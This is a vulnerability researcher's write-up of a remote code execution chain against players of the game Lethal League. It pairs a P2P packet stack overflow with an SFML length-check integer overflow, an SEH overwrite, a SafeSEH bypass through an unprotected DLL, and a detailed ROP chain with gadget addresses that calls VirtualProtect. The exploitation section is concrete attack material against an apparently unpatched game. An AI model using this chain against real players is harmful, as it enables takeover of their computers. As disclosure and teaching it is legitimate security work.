.o88b.
d8P  Y8
8P
8b            o |\  _ 
Y8b  d8 /|/|  | |/ |/ 
 `Y88P'  | |_/|/|_/|_/
________________________________________________________________________________

Remote Code Execution in Lethal League                              January 2025
======================================

My first real vulnerability, and I think quite an interesting one to exploit! If
you don't already know, Lethal League is a projectile fighting game released on
Steam in 2014, and was somewhat popular following a burst of internet attention.
It's far less active than it used to be, but it still has a community of players
to this day.

Discovery
---------
My first indication that there might be a security issue came completely
accidentally. I was messing around with function call hooking and interception
with Lethal League as my poor test subject, and attempted to set my in-game name
to a different value. When I got this working, and noticed it didn't have the
same limit imposed by Steam of 32 characters, I of course promptly set a name
big enough to cover the screen in text and joined a friend's lobby.

But something unexpected happened. He messaged me and said his game had crashed!
Sort of amusing in itself, but as a vulnerability researcher alarm bells were
ringing in my head. A larger input than expected crashing a program? That smells
an awful lot like a buffer overflow...

Testing Setup
-------------
Now how do we actually recreate and debug this? The bug is triggered over the
internet through a Steam lobby, so it isn't quite as simple as connecting to a
local port. We'll need two Steam accounts at the very least to join the same
Steam lobby, but I'd rather not buy the game again.

Enter Spacewar: a hidden but free game on Steam designed to show off Steam's
networking functionality for developers. Combine this with the fact that Steam
games don't actually know their own app IDs, and just trust the Steam client or
a text file to tell them, and you have both a very useful testing environment
and a favourite tactic of game pirates everywhere.

By putting a steam_appid.txt file in the game's directory containing an app ID
and running the executable directly outside of the Steam client, the game will
simply trust the ID it's given and run as whatever app the ID corresponds to.
Spacewar is a perfect app ID to run as, as it's completely free and all
networking features are fully supported. We can simply copy the game files to a
virtual machine, log in to a second Steam account and run the game as Spacewar
on both ends! Now we can fully inspect both ends of a Steam lobby connection and
start looking at this bug properly.

The Actual Bug
--------------
My first move was to just recreate the exact same large name situation that
crashed the game before. I should mention at this point that the developers
very helpfully (intentionally or not) did not strip symbols from the Linux
release of the game! The game is written in C++ and the binary contains full
class descriptions and function names, which made my job far easier.

I set up the exact same name modification as before, and ran the game through
gdb on the other end. After joining the lobby with the huge name, sure enough,
we crash:

--------------------------------------------------------------------------------
*** stack smashing detected ***: terminated

Thread 1 "LethalLeague" received signal SIGABRT, Aborted.
0xf7fc7579 in __kernel_vsyscall ()
--------------------------------------------------------------------------------

I got the following backtrace (edited for brevity):

--------------------------------------------------------------------------------
#0  0xf7fc7579 in __kernel_vsyscall ()
#1  0xf728ea27 in __pthread_kill_implementation () at pthread_kill.c:43
#2  0xf728eaaf in __pthread_kill_internal () at pthread_kill.c:78
#3  0xf723b327 in __GI_raise (sig=6) at ../sysdeps/posix/raise.c:26
#4  0xf7222121 in __GI_abort () at abort.c:79
#5  0xf72231b6 in __libc_message () at ../sysdeps/posix/libc_fatal.c:150
#6  0xf733c3b3 in __GI___fortify_fail () at fortify_fail.c:24
#7  0xf733d29f in __stack_chk_fail () at stack_chk_fail.c:24
#8  0x080de3d3 in CharacterSelectState_Netplay::poll ()
#9  0x41414141 in ?? ()
#10 0x41414141 in ?? ()
#11 0x41414141 in ?? ()
[snip]
--------------------------------------------------------------------------------

The function we were executing before the stack was trashed and the stack canary
check failed seems to be CharacterSelectState_Netplay::poll, so I had a look at
it in Ghidra. Here's a manually cleaned up decompilation:

--------------------------------------------------------------------------------
void CharacterSelectState_Netplay::poll(void *this, sf::Time *arg2)
{
    if (SteamWrapper::is_initialized(Game::getSteamWrapper(this->steam_wrap))) {
        while (true) {
            uint32 size;
            if (!SteamNetworkingWrapper::IsP2PPacketAvailable(&size, 2))
                break;

            CSteamID sender;
            char buf[512];
            if (SteamNetworkingWrapper::ReadP2PPacket(buf, size, &size,
                                                      &sender, 2)) {
                P2PData p2p;
                p2p.sender = CSteamID::ConvertToUint64(&sender);
                sf::Packet::append(&p2p.data, buf, size);
                CharacterSelectState_Netplay::handle_p2p_data(this, &p2p);
            }
        }
    }
}
--------------------------------------------------------------------------------

So what's the issue here? Comparing it to the example code in the Steam API
documentation may enlighten us:

--------------------------------------------------------------------------------
uint32 msgSize = 0;
while (SteamNetworking()->IsP2PPacketAvailable(&msgSize))
{
    void *packet = malloc(msgSize);
    CSteamID steamIDRemote;
    uint32 bytesRead = 0;
    if (SteamNetworking()->ReadP2PPacket(packet, msgSize, &bytesRead,
                                                          &steamIDRemote))
    {
        // message dispatch code goes here
    }
    free(packet);
}
--------------------------------------------------------------------------------

In both cases, the size of the packet to read is retrieved from
IsP2PPacketAvailable, but crucially the official documentation uses this size to
dynamically allocate a buffer to hold the packet, and then read a packet of that
size from the other client.

The Lethal League code instead uses a fixed size 512-byte buffer while still
reading a packet of whatever size is waiting! There's nothing inherently wrong
with using a fixed size buffer here as long as the size of the buffer is
reflected in the size argument to ReadP2PPacket, but that is not the case. If I
had to guess, I would imagine they copied the documentation example and later
switched to a fixed 512-byte buffer as no packet the game naturally sends
exceeds this size, but neglected to update the size of the packet being read.
After checking every instance of ReadP2PPacket in the binary I confirmed the
same vulnerable code pattern was present in every single one.
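
To make the fix concrete, here's a minimal sketch of the fixed-buffer pattern
done safely. It doesn't touch the real Steam API: read_packet is a hypothetical
stand-in for ReadP2PPacket, and kBufSize and poll_once are names invented for
this example. The only point is that the capacity passed to the read call is the
size of the buffer, not the size of the pending packet.

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <cstring>
#include <vector>

// Hypothetical stand-in for ReadP2PPacket: copies at most dest_capacity bytes
// of the pending packet into dest and reports how many bytes were written.
bool read_packet(const std::vector<unsigned char>& pending, void* dest,
                 std::size_t dest_capacity, std::size_t* bytes_read)
{
    const std::size_t n = std::min(pending.size(), dest_capacity);
    if (n > 0)
        std::memcpy(dest, pending.data(), n);
    *bytes_read = n;
    return true;
}

constexpr std::size_t kBufSize = 512;

// Reads one pending packet into a fixed-size stack buffer and returns the
// number of bytes stored. The capacity handed to read_packet is sizeof(buf),
// never the sender-controlled size of the pending packet.
std::size_t poll_once(const std::vector<unsigned char>& pending)
{
    unsigned char buf[kBufSize];
    std::size_t bytes_read = 0;
    if (!read_packet(pending, buf, sizeof(buf), &bytes_read))
        return 0;
    assert(bytes_read <= sizeof(buf));
    return bytes_read;
}
```

In this model a 2000-byte packet is cut down to 512 bytes instead of running
off the end of buf.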

Linux Exploitation
------------------
We seem to have a classic buffer overflow on our hands! But this is the modern
day, so it's not going to be that easy. The game has stack canaries, a
non-executable stack and ASLR. It looked like I would have to either overwrite
other stack variables to manipulate the game's logic into giving me code
execution, or somehow leak the stack canary over the network.

The first idea was defeated pretty quickly by modern compilers and their
annoying security features. The compiler had strategically placed the buffer
right before the canary, so I couldn't overwrite anything interesting without
instantly corrupting the canary and aborting the program at the end of the
function.

Leaking the stack cookie seemed more plausible, so I spent a while looking at
all the different packet types the game accepted and their code paths (having
symbols made this WAY less tedious than it could have been) but I just couldn't
find anything. I was running out of ideas, so I turned to the library Lethal
League used as an abstraction for its networking and many other things: SFML.

SFML provides a simple API to access things like windows, audio, networking and
graphics in a high level and operating system independent manner, and as Lethal
League uses it for networking there was a small chance I could find a bug in the
library itself to leak some stack memory. The library is open source, which made
it easy to audit but did not fill me with hope that there would be any obvious
bugs.

The networking wrapper in question is SFML's sf::Packet class, which abstracts
serialisation and deserialisation for various data types to send and receive
over the network. Some of the data types are extremely simple to serialise, such
as integers and floats, but std::strings were a lot more interesting, especially
as I knew that Lethal League made use of them in its network protocol. As they
vary in size, SFML actually stores the length in the packet and uses that length
when deserialising. If it's part of the packet, we can control it.
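
As a rough picture of what that looks like on the wire, here's a minimal sketch
of a length-prefixed string, assuming a 32-bit big-endian (network byte order)
length followed by the raw characters. serialise_string and read_length_prefix
are names made up for this example and are not part of SFML.

```cpp
#include <cassert>
#include <cstdint>
#include <string>
#include <vector>

// Writes a 32-bit big-endian length prefix followed by the raw characters.
std::vector<unsigned char> serialise_string(const std::string& s)
{
    assert(s.size() <= 0xffffffffu);
    const std::uint32_t len = static_cast<std::uint32_t>(s.size());

    std::vector<unsigned char> out;
    out.push_back(static_cast<unsigned char>((len >> 24) & 0xff));
    out.push_back(static_cast<unsigned char>((len >> 16) & 0xff));
    out.push_back(static_cast<unsigned char>((len >> 8) & 0xff));
    out.push_back(static_cast<unsigned char>(len & 0xff));
    out.insert(out.end(), s.begin(), s.end());
    return out;
}

// Reads the 32-bit big-endian length prefix back out of the serialised bytes.
// Nothing ties this value to the number of bytes that actually follow it.
std::uint32_t read_length_prefix(const std::vector<unsigned char>& bytes)
{
    assert(bytes.size() >= 4);
    return (static_cast<std::uint32_t>(bytes[0]) << 24) |
           (static_cast<std::uint32_t>(bytes[1]) << 16) |
           (static_cast<std::uint32_t>(bytes[2]) << 8) |
            static_cast<std::uint32_t>(bytes[3]);
}
```

Serialising "hi" gives the six bytes 00 00 00 02 'h' 'i'. Whoever sends the
packet is free to rewrite those first four bytes to any value they like.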

This is the code for deserialising an std::string:

--------------------------------------------------------------------------------
Packet& Packet::operator>>(std::string& data)
{
    // First extract string length
    std::uint32_t length = 0;
    *this >> length;

    data.clear();
    if ((length > 0) && checkSize(length))
    {
        // Then extract characters
        data.assign(reinterpret_cast<char*>(&m_data[m_readPos]), length);

        // Update reading position
        m_readPos += length;
    }

    return *this;
}
--------------------------------------------------------------------------------

It seems they do actually validate the length in checkSize. This is the code for
checkSize:

--------------------------------------------------------------------------------
bool Packet::checkSize(std::size_t size)
{
    m_isValid = m_isValid && (m_readPos + size <= m_data.size());

    return m_isValid;
}
--------------------------------------------------------------------------------

This ensures the length cannot exceed the length of the rest of the packet. The
logic looks sound, so is there no bug here? There is, but it's a little subtle.
While this check does generally work, in the specific case where the sum
m_readPos + size overflows size_t, it wraps around to a small value and passes
the check, allowing us to smuggle in a gigantic string size that far surpasses
the buffer. When I had this thought I decided to test my theory locally and
wrote this small test program which constructs a serialised string with a
custom length and attempts to deserialise it:

--------------------------------------------------------------------------------
#include <iostream>
#include <cstdlib>
#include <cstdint>
#include <string>

#include <SFML/Network/Packet.hpp>

struct serial_str {
    uint32_t length;
    char data[2];
};

int main(void)
{
    serial_str str;
    str.length = 0xffffffff;
    str.data[0] = 'h';
    str.data[1] = 'i';

    sf::Packet packet;
    packet.append(&str, sizeof(str));

    std::string out;
    packet >> out;

    std::cout << out << std::endl;

    return EXIT_SUCCESS;
}
--------------------------------------------------------------------------------

Reading the length advances m_readPos to 4, so the check computes
4 + 0xffffffff. If that sum wraps around it becomes 3, comfortably within the
packet, and the check should pass.

However when I tried it, I got no output. Seemingly the check had worked
properly and prevented the string from being created. After a bit more thinking
I figured out the issue - having compiled this on my 64-bit machine, size_t was
defined to be 64 bits wide, and both variables in the comparison are of type
size_t. Meanwhile, the length read from the packet was always defined as the
32-bit uint32_t. This means that the comparison is done in 64 bits and the
addition of the 32-bit size can never overflow it.
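
The difference is easy to see with the arithmetic pulled out on its own. This is
a minimal sketch that models the comparison with explicit fixed-width types
rather than size_t, so it behaves the same on any machine. All three function
names are made up for this example, and check_size_safe is just one
overflow-safe way to write the check, not necessarily what SFML does.

```cpp
#include <cassert>
#include <cstdint>

// The check as it behaves when size_t is 32 bits wide: the sum wraps modulo
// 2^32 before the comparison happens.
bool check_size_32(std::uint32_t read_pos, std::uint32_t size,
                   std::uint32_t data_size)
{
    const std::uint32_t end = static_cast<std::uint32_t>(read_pos + size);
    return end <= data_size;
}

// The same check when size_t is 64 bits wide: adding a 32-bit length to a
// small read position cannot wrap, so the comparison is honest.
bool check_size_64(std::uint64_t read_pos, std::uint32_t size,
                   std::uint64_t data_size)
{
    return read_pos + size <= data_size;
}

// Hypothetical overflow-safe form: compare the requested size against the
// bytes remaining instead of adding to the read position.
bool check_size_safe(std::uint32_t read_pos, std::uint32_t size,
                     std::uint32_t data_size)
{
    assert(read_pos <= data_size);
    return size <= data_size - read_pos;
}
```

With a read position of 4, a length of 0xffffffff and 6 bytes of data, the
32-bit version accepts the length (the sum wraps to 3) while the other two
reject it.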

Lethal League is a 32-bit binary however, so I just added -m32 to my compiler
flags, compiling the program in 32-bit mode. This redefines size_t to be 32
bits wide and produces this output:

--------------------------------------------------------------------------------
terminate called after throwing an instance of 'std::length_error'
  what():  basic_string::_M_replace
[1]    7001 IOT instruction (core dumped)  ./test
--------------------------------------------------------------------------------

That certainly looks promising, but isn't the huge dump of stack memory I had
hoped for. After some research I found out that std::strings in C++ actually
have a maximum size, defined by std::string::max_size, and if this size is
exceeded an std::length_error exception is thrown. Another problem is that even
had the stack leak succeeded, it would read so far out of bounds that the
program would either crash or throw an access violation exception.
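
The max_size behaviour can be checked in isolation. This is a minimal sketch
with a made-up helper name, and it deliberately uses the fill overload
assign(n, ch) rather than the pointer overload SFML calls, so that no
out-of-bounds source buffer is involved.

```cpp
#include <cassert>
#include <cstddef>
#include <stdexcept>
#include <string>

// Returns true if asking a std::string to hold n characters is rejected with
// std::length_error, and false if the assignment goes through.
bool assign_throws_length_error(std::size_t n)
{
    std::string s;
    try {
        s.assign(n, 'A');
    } catch (const std::length_error&) {
        return true;
    }
    assert(s.size() == n);
    return false;
}
```

Passing std::string().max_size() + 1 takes the throwing path, while a small
count like 8 does not. On a 32-bit build 0xffffffff is always above max_size,
which is why the test program died with the exception.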

This might be a solvable problem if m_readPos was so large already that the size
required to overflow was small enough to not trigger either of these exceptions.
In the absence of another bug to desync m_readPos from the buffer, the only way
to do this would be to send an sf::Packet in the gigabytes. Steam certainly
won't allow this and it would be very impractical even if possible, so this
approach too seems to have reached a dead end. Keep this bug in mind for later
though!

Windows Exploitation
--------------------
Having run out of ideas, I decided to check the Windows release of the game just
in case something was different. The Windows release was stripped, but after a
bit of string cross-referencing and matching code patterns in both releases I
found the same vulnerable function as we found in the Linux version. To my
surprise, there actually was a meaningful difference - two new strange values
pushed onto the stack at the beginning of the function:

    push 0xffffffff
    push 0x54cf0b

The second value seemed to be the address of a function, which eventually ended
up jumping to __CxxFrameHandler3. Apparently this formed part of Windows'
Structured Exception Handling (SEH), and overwriting the exception handler
function pointers is a well-known Win32 exploitation technique.

The full setup looks like this:

    push 0xffffffff
    push 0x54cf0b
    mov eax, dword ptr fs:[0]
    push eax
    mov dword ptr fs:[0], esp

A similar routine is performed in reverse at the end of the function to restore
the original value of fs:[0]. What's happening here? First we need to understand
how SEH works. SEH uses a linked list of exception handlers (function pointers)
that it traverses to find an exception handler that can handle the current
exception when one is raised. A node in this linked list has this structure:

--------------------------------------------------------------------------------
struct _EXCEPTION_REGISTRATION_RECORD { 
    struct _EXCEPTION_REGISTRATION_RECORD *Next; 
    PEXCEPTION_ROUTINE Handler; 
};
--------------------------------------------------------------------------------

A pointer to the first node in the list is stored in the Thread Environment
Block (TEB), which can be accessed via offsets from the fs segment register.
This pointer to the head of the SEH chain is the first entry in the TEB, located
at fs:[0]. You can ignore the 0xffffffff (-1) push which just helps deal with
nested try/catch statements, and focus on the effect of the instructions after
it.

The new exception handler address is pushed to the stack as the Handler in the
new node, the old address of the list head is saved on the stack as the new Next
pointer, and the list head at fs:[0] is overwritten with the current stack
pointer, which points at the newly created SEH node on the stack. Now the new
node points to the old head of the list, and the head of the list points to this
new node, essentially prepending this new exception handler to the SEH chain.
This process is reversed and the old value restored at the end of the function.
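
The prepend-and-restore dance is easier to follow as ordinary code. This is a
portable model only: g_chain_head stands in for the pointer at fs:[0], and
Record, ScopedHandler and chain_depth are names invented for this sketch. It
uses nullptr to end the list where the real chain uses 0xffffffff.

```cpp
#include <cassert>
#include <cstddef>

using Handler = int (*)();

// Model of one SEH registration record.
struct Record {
    Record* next;
    Handler handler;
};

// Stands in for the list head that really lives at fs:[0] in the TEB.
Record* g_chain_head = nullptr;

// Mirrors the function prologue and epilogue: the constructor prepends a
// record living in the current stack frame, the destructor unlinks it.
class ScopedHandler {
public:
    explicit ScopedHandler(Handler h) : record_{g_chain_head, h}
    {
        g_chain_head = &record_;      // mov dword ptr fs:[0], esp
    }
    ~ScopedHandler()
    {
        assert(g_chain_head == &record_);
        g_chain_head = record_.next;  // restore the previous head
    }
    ScopedHandler(const ScopedHandler&) = delete;
    ScopedHandler& operator=(const ScopedHandler&) = delete;

private:
    Record record_;
};

// Walks the chain from the head and counts the registered handlers.
std::size_t chain_depth()
{
    std::size_t depth = 0;
    for (const Record* r = g_chain_head; r != nullptr; r = r->next)
        ++depth;
    return depth;
}

int outer_handler() { return 1; }
int inner_handler() { return 2; }
```

Nesting two ScopedHandler objects gives a chain of depth two with the inner
handler at the head, and the chain shrinks back as each scope exits. Note that
record_ sits in the stack frame of whichever function created it.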

The most interesting thing about this system is that the function pointers are
just placed right there on the stack. The compiler does place it behind the
stack canary, but there's still a way to exploit this. If we can overwrite the
exception handler and then trigger an exception inside the function before the
stack canary is checked, we should be able to control the instruction pointer!

After creating a more controlled exploit script that directly interacts with the
Steam SDK to connect to the lobby and send custom packets, I tried my first
payload. 512 bytes of As to fill the buffer and 4 more for the stack canary, and
we should be at the SEH structure. I overwrote the next SEH pointer with
0xffffffff to signify the end of the SEH chain (though it doesn't particularly
matter) and the actual exception handler with 0xcafebabe. Running the other end
through x64dbg I saw this in the SEH overview:

[Image: Corrupted SEH Exception Handler]
(sorry to break up the lovely ASCII aesthetic)

Looks like we control the exception handler! Now we just need a way to get the
function to throw an exception before it returns. Do you remember the SFML bug
from earlier? std::string throws an exception when it's allocated with a size
that large, which is actually perfect! The game's own protocol identifies packet
types via the first byte of the packet, which then calls a handling function.
One of these is called on_player_update, which eventually reads five 1-byte
values from the packet and then an std::string, all through SFML's sf::Packet
wrapper. If we can lead the game down this code path and get it to deserialise
our string, which triggers the bug inside SFML and causes an std::length_error
to be thrown, we can get the function to call our corrupted exception handler!

I added this to my script and changed the exception handler pointer to a real
mapped address and saw this:

[Image: Invalid Exception Handler]

It seems to have worked, sort of? The std::string exception was thrown, but the
program crashes complaining about an invalid exception handler. What I had
stumbled into was a security mitigation known as SafeSEH. Overwriting the SEH
chain has been a known exploitation technique for a long time (though why they
put it right there on the stack in the first place eludes me), so Microsoft
implemented SafeSEH, a build-time security feature which embeds a table of valid
exception handlers in each module. The table is checked at runtime to ensure
any executed exception handlers have not been corrupted, or at least not
corrupted to an address which is not a real exception handler.

Once again, I hit a roadblock. I didn't have a way to defeat this without
another bug somewhere. Just to be sure, I checked every DLL packaged with the
game in the hopes one wouldn't have SafeSEH enabled, as the SafeSEH table is
local to each DLL. If one DLL had it disabled, I could use corrupted exception
handlers in that DLL's address space unchecked.
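
Here's the idea as a greatly simplified model. The real validation in Windows
performs more checks than this, so treat it as a sketch of the per-module logic
only. Module and handler_allowed are names invented for this example, and any
base addresses and sizes fed to it are made up.

```cpp
#include <algorithm>
#include <cassert>
#include <cstdint>
#include <vector>

// Simplified view of a loaded module for the purposes of handler validation.
struct Module {
    std::uint32_t base;
    std::uint32_t size;
    bool has_safeseh_table;
    std::vector<std::uint32_t> valid_handlers;  // absolute addresses
};

// Decides whether an exception handler address would be accepted.
bool handler_allowed(const std::vector<Module>& modules, std::uint32_t handler)
{
    for (const Module& m : modules) {
        assert(m.size <= 0xffffffffu - m.base);
        if (handler < m.base || handler - m.base >= m.size)
            continue;  // not inside this module

        // A module built without SafeSEH has no table to check against, so
        // any address inside it passes.
        if (!m.has_safeseh_table)
            return true;

        return std::find(m.valid_handlers.begin(), m.valid_handlers.end(),
                         handler) != m.valid_handlers.end();
    }
    // Outside every known module: rejected in this simplified model.
    return false;
}
```

In this model, an address inside a SafeSEH module is only accepted if it's in
that module's table, while every address inside a module without a table is
accepted.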

To this end I ran PESecurity against everything in the game's directory. Here's
some of what I got:

--------------------------------------------------------------------------------
PS C:\Users\User\lethalleague> Get-PESecurity -directory .

FileName         : C:\Users\User\lethalleague\LethalLeague.exe
ARCH             : I386
DotNET           : False
ASLR             : True
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : True
ControlFlowGuard : False
HighentropyVA    : N/A

FileName         : C:\Users\User\lethalleague\libconfig++.dll
ARCH             : I386
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : True
ControlFlowGuard : False
HighentropyVA    : N/A

FileName         : C:\Users\User\lethalleague\libsndfile-1.dll
ARCH             : I386
DotNET           : False
ASLR             : False
DEP              : False
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : False
ControlFlowGuard : False
HighentropyVA    : N/A

[snip]

FileName         : C:\Users\User\lethalleague\titan_ggpo.dll
ARCH             : I386
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : True
ControlFlowGuard : False
HighentropyVA    : N/A
--------------------------------------------------------------------------------

Do you see that? For some reason libsndfile-1.dll is compiled with no
protections at all, not SafeSEH or even ASLR! Jackpot! Now I can use a false
exception handler within libsndfile-1.dll's address space, with no SafeSEH table
to contend with. Even better, I can start ROP chaining using fixed address
gadgets from libsndfile due to the lack of ASLR. First I tried just changing the
address of the SEH exception handler to point inside libsndfile-1.dll's address
space:

[Image: Corrupted EIP]

It works! We have control of the instruction pointer!

Code Execution
--------------
Now we need to leverage this for full code execution. We'll have to use ROP, as
DEP (Windows' name for non-executable data memory, the stack included) is in
effect for the whole process.

This article was really helpful for me in understanding how to properly use ROP
on Windows, and I recommend giving it a read if you're trying something
similar. Much of the following process comes from that article, though with some
creativity required due to the available ROP gadgets.

Our current buffer looks like this:

                                          stack canary
                                               |
                                               v
 +-------------+----------+-------------+-------+----------+-----------+
 |player update|misc match|string length|padding| next seh |seh handler|
 |  packet id  |   data   | 0xffffffff  |       |0xffffffff|           |
 +-------------+----------+-------------+-------+----------+-----------+
0x0           0x1        0x6           0xa    0x204      0x208       0x20c

We can jump to any address within libsndfile-1.dll using the SEH handler, but
the stack isn't going to be at our buffer any more after this call. In fact it's
located quite far back up the stack. Luckily I did find a gadget to get the
stack pointing back inside our buffer, albeit toward the end of our available
space. This is the gadget I used as the SEH handler:

    add esp, 0x13c4
    pop ebx
    pop ebp
    ret

Now that we have the stack at some place in our buffer we have far more freedom
to chain gadgets for more complex effects. First though, we should move the
stack towards the front of our buffer for more space. Throughout the ROP chain
you'll see a lot of 0xdeadbeef: these are throwaway values for stack slots we
don't really care about, such as the one consumed by a 'pop ebp'.

--------------------------------------------------------------------------------
0x7045fe6c: ret
0x7045fe6c: ret
0x7045fe6c: ret
[...] (ROPNOP sled)

0x7045fcf9: mov edx, 0x800; cmovg eax, edx; pop ebp; ret
0xdeadbeef

0x7049c261: push esp; pop ebp; ret
0x7049fe6a: xchg ebp, eax; fcos; dec ecx; ret
0x7047f788: sub eax, edx; pop ebp; ret
0xdeadbeef

0x7049fe6a: xchg ebp, eax; fcos; dec ecx; ret
0x704412d2: mov esp, ebp; pop ebp; ret
--------------------------------------------------------------------------------

This, in a roundabout way, subtracts 0x800 from the stack pointer and places us
much earlier in our controlled buffer. This may look a little overcomplicated,
but remember I'm working with what I have! The only way I found to get and set
esp directly is through ebp, and the only register which could easily copy from
and write to ebp is eax. The only sub gadget I found for eax in turn takes its
operand from edx, hence the many register exchanges to achieve this simple
task. The other parts of the ROP chain are similar.

Also note the ROPNOP sled, which allows us to be imperfect with the exact stack
offset after the SEH handler. As long as we hit one of the ROPNOPs, we'll reach
our ROP chain.

Now that we have a lot more space to work with, how can we actually turn this
into arbitrary code execution? A well known way to do this on Windows using ROP
is by simply setting execute permissions for some shellcode on the stack using
the Windows API and jumping to it. This is not so simple in practice however.

How do we even call a function with the parameters we want? On top of that,
parameters which will be different every time we run the program, such as stack
addresses?

First we can look at the parameters of the function we wish to call. We'll use
VirtualProtect from the Windows API to set some of our stack memory as
executable. Here are the function arguments from the Microsoft website:

--------------------------------------------------------------------------------
BOOL VirtualProtect(
  [in]  LPVOID lpAddress,
  [in]  SIZE_T dwSize,
  [in]  DWORD  flNewProtect,
  [out] PDWORD lpflOldProtect
);
--------------------------------------------------------------------------------

This modifies the page permissions of the memory region located at lpAddress of
size dwSize to the permissions specified in flNewProtect. It also requires a
writeable address for the old permission set to avoid a crash.

This means we need a way to generate the address of our shellcode dynamically as
the exact stack addresses will change on every execution, and somehow use this
as an argument to this specific function call. Function calls in 32-bit Windows
take their arguments sequentially from the stack, so the way we generate dynamic
arguments is to set up a call site for us to use later with dummy argument
values, which we can then fill in using further gadgets. When we're finished, we
can jump to our call site with the stack set up with the arguments we want.

We have the luxury of being able to use null bytes in our payload, so we only
have two parameters which need to be dynamically calculated, along with the
return address after the function call which should return directly into our
then-executable shellcode:

--------------------------------------------------------------------------------
0x7049c261: push esp; pop ebp; ret
0x7049fe6a: xchg ebp, eax; fcos; dec ecx; ret

0x704ae472: xchg edx, eax; add esp, 0x54; pop ebx; pop ebp; ret

0xdeadbeef

0x704cb7fa: pop eax; ret
0x7066e2f8: pointer to VirtualProtect addr - 4

0x704d15dc: mov eax, dword ptr [eax + 4]; push eax; ret

0xaaaaaaaa: return address

0xbbbbbbbb: lpAddress
0x00000fff: dwSize
0x00000040: flNewProtect (0x40 = PAGE_EXECUTE_READWRITE)
0xcccccccc: writeable address
--------------------------------------------------------------------------------

libsndfile-1.dll uses VirtualProtect, so it maintains pointers to it in the
address space which I can use. This in conjunction with a gadget that loads an
address from eax (offset by 4 bytes) and instantly calls it by pushing eax and
returning straight away gives me a combination of gadgets to call
VirtualProtect. During this pseudo function call, the stack will contain the
values in the payload right after it, so we can construct a stack frame. The
first value will be the return address for VirtualProtect, which we will fill in
with the address of the shellcode. lpAddress also needs to point to the
shellcode to give it permission to execute from the stack. dwSize and
flNewProtect are already set directly as they are constant values, but the
writeable address needs to be set dynamically to some stack value.

You can see the gadgets before the call site save the current stack location
into edx before jumping over the dummy call site. We don't want to call
VirtualProtect just yet, so we jump over it to the rest of our ROP chain, while
saving that stack location to begin overwriting the dummy placeholders with real
values using edx as a pointer.

We now need some gadgets to write values to our stack parameters. We have a
stack pointer near our parameters in edx and this helpful gadget to write
32-bit values through it:

    mov dword ptr [edx + 8], eax
    xor eax, eax
    pop ebp
    ret

We also have a gadget to advance the pointer and reach all the parameters
sequentially:

    inc edx
    add al, 0x5d
    ret

Note that both of these trash the value in eax, so we'll also keep a copy of the
old stack address in ebx, as edx will change as we move to different parameters.

With this we can begin writing our parameters. We first save the current stack
pointer into ebx for later:

--------------------------------------------------------------------------------
0x704866d0: mov eax, edx; pop edi; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7045803b: push eax; pop ebx; pop esi; pop ebp; ret
0xdeadbeef
0xdeadbeef
--------------------------------------------------------------------------------

Now we move edx to point to the first value to overwrite (the return address),
calculate the address of the shellcode (placed in our payload such that the
calculated address points somewhere inside the beginning NOP sled) and write it
to the stack through edx. Note that when restoring the value from ebx, it must
be recopied to ebx again as the gadget to read from ebx also trashes its value.

--------------------------------------------------------------------------------
0x70488804: inc edx; add al, 0x5d; ret
[repeat 15 more times]

0x704d07d5: mov eax, ebx; pop ebx; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7045803b: push eax; pop ebx; pop esi; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7048a5e8: add eax, 0x1b8; add cl, cl; ret

0x7046aca0: mov dword ptr [edx + 8], eax; xor eax, eax; pop ebp; ret
0xdeadbeef
--------------------------------------------------------------------------------

Similarly for setting lpAddress:

--------------------------------------------------------------------------------
0x70488804: inc edx; add al, 0x5d; ret
0x70488804: inc edx; add al, 0x5d; ret
0x70488804: inc edx; add al, 0x5d; ret
0x70488804: inc edx; add al, 0x5d; ret

0x704d07d5: mov eax, ebx; pop ebx; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7045803b: push eax; pop ebx; pop esi; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7048a5e8: add eax, 0x1b8; add cl, cl; ret

0x7046aca0: mov dword ptr [edx + 8], eax; xor eax, eax; pop ebp; ret
0xdeadbeef
--------------------------------------------------------------------------------

And finally the arbitrary writeable address to receive the old permissions, for
which we'll just use the address stored in ebx:

--------------------------------------------------------------------------------
0x70488804: inc edx; add al, 0x5d; ret
[repeat 11 more times]

0x704d07d5: mov eax, ebx; pop ebx; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7045803b: push eax; pop ebx; pop esi; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7046aca0: mov dword ptr [edx + 8], eax; xor eax, eax; pop ebp; ret
0xdeadbeef
--------------------------------------------------------------------------------

With the constructed stack frame now set up, we just need to jump back to our
call site, which is located 8 bytes after the current value in ebx:

--------------------------------------------------------------------------------
0x704d07d5: mov eax, ebx; pop ebx; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7047f877: add eax, 7; ret
0x70447e21: inc eax; ret

0x7049fe6a: xchg ebp, eax; fcos; dec ecx; ret
0x704412d2: mov esp, ebp; pop ebp; ret
--------------------------------------------------------------------------------

After the VirtualProtect function is entered, the stack is now set up so that
the return address points into our shellcode, and the arguments are set up for
VirtualProtect to set executable permissions on our shellcode, which it will
return into after finishing.

With this, we finally have arbitrary code execution!

You can see a video of the exploit in action from the victim's perspective here.

The victim creates a lobby in-game, then I get their lobby ID from their Steam
profile and run the exploit in the background. This was done on a vanilla
Windows 10 installation.

The bug in SFML has since been reported and fixed. Team Reptile however have
confirmed they have no intention to release a fix for the buffer overflow(s).

This whole process was a lot of fun! I learnt a lot about Windows internals and
exploitation, and even managed to combine a separate bug in a library for the
exploit chain. It's also interesting that I couldn't find an exploit on Linux
while I could on Windows, but you can reach whichever conclusions from that you
wish to :)